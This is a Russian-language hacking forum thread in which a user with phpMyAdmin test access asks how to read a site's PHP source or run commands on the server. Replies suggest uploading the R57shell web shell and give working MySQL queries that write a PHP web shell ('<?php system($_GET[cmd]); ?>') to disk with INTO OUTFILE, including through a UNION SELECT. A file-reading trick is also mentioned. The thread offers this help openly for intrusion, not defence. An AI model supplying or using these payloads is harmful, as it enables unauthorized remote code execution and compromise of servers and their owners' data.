![]() |
MySQL...вопрос на засыпку...
Здравствуйте...
у меня такой вопорс к экспертам форума... у меня есть phpMyAdmin...могу зайти в тестовом режиме...и могу выполнять SQL запросы...можно ли сформировать такой запрос чтобы, допустим качнуть файл из директории /home/docs/htdocs/index.php в его чистом виде...т.е до обработки его сервером. если да то помогите составить запрос...или как выполнить какую-нибдуь команду... Заранее спасибо...надеюсь на фашу помощь... С наилучшими пожеланиями! |
заливай шелл и качай че хош!
R57shell |
Читай статью про MySQL у меня в подписи.
Вкратце: В phpmyadmin есть функция выполнения произвольного SQL кода. Тебе нужно знать лишь установочную дирректорию сайта. Дальше лазишь по phpmyadmin и находишь таблицу и смотришь колличество ее столбцов. и составляешь запрос по типу UNION SELECT 1,2,3...кол-во столбцов и в последнем <?php system($_GET[c]);?> FROM имя_таблицы INTO OUTFILE тут_в_одинарных_ковычках_пу ть_к_файлу_куда_писать НО! данная вещь сработает только если у твоего юзера есть права file_priv |
nc.STRIEM
..наверно очень глупый вопрос,но все же как залить файл на сервак если у меня нету прав админа...у меня есть только строка выполняющая мои SQL запросы...очень плохо шарю в MySQL... LoFFi твой способ еще не порбывал не было времени, но всеравно спасибо... заранее спасибо |
Цитата:
|
Прочитать файл можно и в MySQL.
Код:
CREATE TABLE `c` (`t` TEXT);А запись шелла делается проще - Код:
SELECT '<?php system($_GET[cmd]); ?>' INTO OUTFILE '/home/.../shell.php'; |
всем большое спасибо...
но мне сервер выдает постоянно ошибку...т.е базы он создает...но не выполняет нужный код Код:
CREATE TABLE `c` (`t` TEXT);Код:
#1045 - Access denied for user ''@'localhost' (using password: NO) |
>#1045 - Access denied for user ''@'localhost' (using password: NO)
Запрещена работа с файлами, так что ты ничего не прочитаеш и не сохраниш >можно через SQL-запрос поставить пасс на весь аккаунт БД Если у тебя есть доступ к БД mysql то можеш, если полный доступ, то можеш и права на запись поставить, хотя в этом сильно сомневаюсь. |
ладно чуваки большое спасибо за помощь....обидно...
ну ничто долаем=)) ...я думаю тема закрыта... С наилучшими пожеланиями! |
LoFFi, готов поспорить))
Цитата:
|
| Время: 10:43 |